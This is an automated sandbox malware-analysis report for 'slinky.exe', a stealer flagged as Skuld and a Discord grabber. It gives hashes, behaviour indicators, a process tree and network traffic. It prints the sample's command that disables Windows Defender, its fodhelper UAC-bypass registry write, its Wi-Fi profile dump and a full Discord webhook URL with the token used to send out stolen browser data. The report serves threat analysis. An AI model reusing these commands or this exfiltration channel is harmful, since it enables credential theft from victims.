File name:

slinky.exe

Full analysis: https://app.any.run/tasks/8b2b9032-6f63-47ba-83b5-72345e6d3ff3
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: October 05, 2024, 22:21:43
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
discord
stealer
uac
exfiltration
susp-powershell
crypto-regex
discordgrabber
generic
ims-api
ip-check
skuld
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64, for MS Windows
MD5:

7E26817146B9CA70F5A1F271B381FDC8

SHA1:

A87A69FA8C6833F818F878F6C5A5EC010B99DAE4

SHA256:

CEEACED15D7A6D72BEA0AA59BB3CACCC5D5E0089B4B980658C5709D3F96B31FB

SSDEEP:

98304:9NY1Vi2yyOg7ukO0RRaOhVHBrJ9vcrfvnCtNo7vg/NtoZCYATW3Bi1jq2Rx7ZSCy:0khDeXG9Osz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass User Account Control (Modify registry)

      • slinky.exe (PID: 5632)

    • Actions looks like stealing of personal data

      • slinky.exe (PID: 6844)

    • Adds path to the Windows Defender exclusion list

      • slinky.exe (PID: 6844)

    • Steals credentials from Web Browsers

      • slinky.exe (PID: 6844)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4236)

    • Changes powershell execution policy (Bypass)

      • slinky.exe (PID: 6844)

    • Windows Defender preferences modified via 'Set-MpPreference'

      • slinky.exe (PID: 6844)

    • SKULD has been detected (YARA)

      • slinky.exe (PID: 6844)

    • DISCORDGRABBER has been detected (YARA)

      • slinky.exe (PID: 6844)

  • SUSPICIOUS

    • Changes default file association

      • slinky.exe (PID: 5632)

    • Uses WMIC.EXE to obtain a list of video controllers

      • slinky.exe (PID: 6844)

    • Starts CMD.EXE for commands execution

      • slinky.exe (PID: 5632)

    • Read disk information to detect sandboxing environments

      • slinky.exe (PID: 6844)

    • Starts POWERSHELL.EXE for commands execution

      • slinky.exe (PID: 6844)

    • Uses WMIC.EXE to obtain operating system information

      • slinky.exe (PID: 6844)

    • Uses WMIC.EXE to obtain CPU information

      • slinky.exe (PID: 6844)

    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 1684)

    • Uses WMIC.EXE to obtain Windows Installer data

      • slinky.exe (PID: 6844)

    • The process bypasses the loading of PowerShell profile settings

      • slinky.exe (PID: 6844)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 3824)

    • Uses NETSH.EXE to obtain data on the network

      • slinky.exe (PID: 6844)

    • BASE64 encoded PowerShell command has been detected

      • slinky.exe (PID: 6844)

    • Base64-obfuscated command line is found

      • slinky.exe (PID: 6844)

    • Script disables Windows Defender's IPS

      • slinky.exe (PID: 6844)

    • Checks for external IP

      • slinky.exe (PID: 6844)
      • svchost.exe (PID: 2256)

    • Uses ATTRIB.EXE to modify file attributes

      • slinky.exe (PID: 6844)

    • Script disables Windows Defender's real-time protection

      • slinky.exe (PID: 6844)

    • There is functionality for capture public ip (YARA)

      • slinky.exe (PID: 6844)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • slinky.exe (PID: 6844)

    • Script adds exclusion path to Windows Defender

      • slinky.exe (PID: 6844)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 3824)

    • Found regular expressions for crypto-addresses (YARA)

      • slinky.exe (PID: 6844)

  • INFO

    • Reads the computer name

      • slinky.exe (PID: 5632)

    • Checks supported languages

      • slinky.exe (PID: 5632)

    • The process uses the downloaded file

      • cmd.exe (PID: 2340)

    • Drops encrypted JS script (Microsoft Script Encoder)

      • slinky.exe (PID: 5632)
      • slinky.exe (PID: 6844)

    • Sends debugging messages

      • slinky.exe (PID: 6844)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 4892)
      • WMIC.exe (PID: 1684)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2256)
      • slinky.exe (PID: 6844)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • slinky.exe (PID: 6844)

    • Create files in a temporary directory

      • slinky.exe (PID: 6844)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(6844) slinky.exe
Discord-Webhook-Tokens (1)1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
Discord-Info-Links
1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
Get Webhook Infohttps://discord.com/api/webhooks/1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 4865024
InitializedDataSize: 474624
UninitializedDataSize: -
EntryPoint: 0x6e000
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
20
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start slinky.exe no specs conhost.exe no specs cmd.exe no specs fodhelper.exe no specs fodhelper.exe no specs conhost.exe no specs svchost.exe powershell.exe no specs wmic.exe no specs THREAT slinky.exe wmic.exe no specs wmic.exe no specs wmic.exe no specs netsh.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs attrib.exe no specs attrib.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1684wmic os get CaptionC:\Windows\System32\wbem\WMIC.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1936attrib +r C:\WINDOWS\System32\drivers\etc\hostsC:\Windows\System32\attrib.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
2256C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2340cmd.exe /C fodhelperC:\Windows\System32\cmd.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA1DB.tmp" "c:\Users\admin\AppData\Local\Temp\w0t5ljzz\CSC120D159024DC43C18DB2976720EB56F6.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
2628powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2632netsh wlan show profilesC:\Windows\System32\netsh.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3824"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\w0t5ljzz\w0t5ljzz.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
3836fodhelperC:\Windows\System32\fodhelper.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Features On Demand Helper
Exit code:
3221226540
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fodhelper.exe
c:\windows\system32\ntdll.dll
3924\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeslinky.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 379
Read events
17 378
Write events
1
Delete events
0

Modification events

(PID) Process:(5632) slinky.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
Executable files
2
Suspicious files
5
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
4236powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1ek21a5k.gji.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6844slinky.exeC:\Users\admin\AppData\Local\Temp\browsers.zipcompressed
MD5:91CCE39DE82F6B8B6E3A39EE0E990AC5
SHA256:8B68EAC50D5DB06A5AB81DBA89E0E1E0008B452073D721134181D67599A0AA89
4236powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_la1kes0m.swb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6844slinky.exeC:\Users\admin\AppData\Local\Temp\browsers-temp\admin\Edge\Default\cookies.txttext
MD5:4E7E979B554CE1F04144AAF6C5F6A321
SHA256:DAA03BBC2A5969DD0129DD53FC3FA889BC1938DB3622C1C1B8DA9AA951401C73
3824csc.exeC:\Users\admin\AppData\Local\Temp\w0t5ljzz\CSC120D159024DC43C18DB2976720EB56F6.TMPbinary
MD5:0F9BA4EA9929A956AA08CD37425B0A78
SHA256:224867329F7AA6E2B939D7FF73B300EDCB6C3511F813D9B492FA01E2B221B714
3824csc.exeC:\Users\admin\AppData\Local\Temp\w0t5ljzz\w0t5ljzz.outtext
MD5:0964B064D18E1D99ECAC59899EBDBB8A
SHA256:A544E667AA97E2F6170E16E5EBE9FF4D8E329154C9ACCFFC1BE7C5D35E566D7F
4236powershell.exeC:\Users\admin\AppData\Local\Temp\w0t5ljzz\w0t5ljzz.cmdlinetext
MD5:F26C36ED0CE706AA102F77DEB3E64568
SHA256:BACB530AF83BD0036B27F3D42AFFD07DE4BB757F27E4E35A5AFB1714B733B7A5
5964powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2sphmevh.cea.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3824csc.exeC:\Users\admin\AppData\Local\Temp\w0t5ljzz\w0t5ljzz.dllexecutable
MD5:EAFE612AF3C198AF0E89FAB5DB0EBC41
SHA256:EBFF1CDA7BE61328C305AF349EC656B53D59789E56F6AF88150DAF8487A92E3E
4236powershell.exeC:\Users\admin\AppData\Local\Temp\TCt53vVwtr\Display (1).pngimage
MD5:94D466C4147753931B6B85A2C241C236
SHA256:3C0780C18B3AA30EFB574BC0DEE0509DA717DAEDCE4E3833B8458478C339F0C1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
30
DNS requests
6
Threats
24

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6844
slinky.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
US
binary
314 b
shared
6844
slinky.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
US
text
6 b
shared
GET
404
45.112.123.126:443
https://api.gofile.io/getServer
SG
text
14 b
whitelisted
GET
200
104.26.13.205:443
https://api.ipify.org/
US
text
14 b
malicious
POST
404
162.159.135.232:443
https://ptb.discord.com/api/webhooks/1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
unknown
binary
45 b
whitelisted
POST
404
162.159.136.232:443
https://ptb.discord.com/api/webhooks/1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
unknown
binary
45 b
whitelisted
POST
404
162.159.128.233:443
https://ptb.discord.com/api/webhooks/1291675112323416086/ekKHKYdeTlB5ft63sBznu78rlTl4WJVeYMB2w6UXjxlTDqVo5r3nhS1SDDIxbzvUjs9p
unknown
binary
45 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
172.67.74.152:443
api.ipify.org
CLOUDFLARENET
US
shared
6844
slinky.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
shared
6844
slinky.exe
45.112.123.126:443
api.gofile.io
AMAZON-02
SG
whitelisted
6844
slinky.exe
162.159.136.232:443
ptb.discord.com
CLOUDFLARENET
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 172.217.18.110
whitelisted
api.ipify.org
  • 172.67.74.152
  • 104.26.12.205
  • 104.26.13.205
shared
ip-api.com
  • 208.95.112.1
shared
api.gofile.io
  • 45.112.123.126
whitelisted
ptb.discord.com
  • 162.159.136.232
  • 162.159.128.233
  • 162.159.138.232
  • 162.159.137.232
  • 162.159.135.232
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup api.ipify.org
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External IP Lookup by HTTP (api .ipify .org)
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
2256
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2256
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
6844
slinky.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
6844
slinky.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2256
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
1 ETPRO signatures available at the full report
Process
Message
slinky.exe
h
slinky.exe
%
slinky.exe
h
slinky.exe
%
slinky.exe
h
slinky.exe
%
slinky.exe
h
slinky.exe
%
slinky.exe
h
slinky.exe
%
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
slinky.exe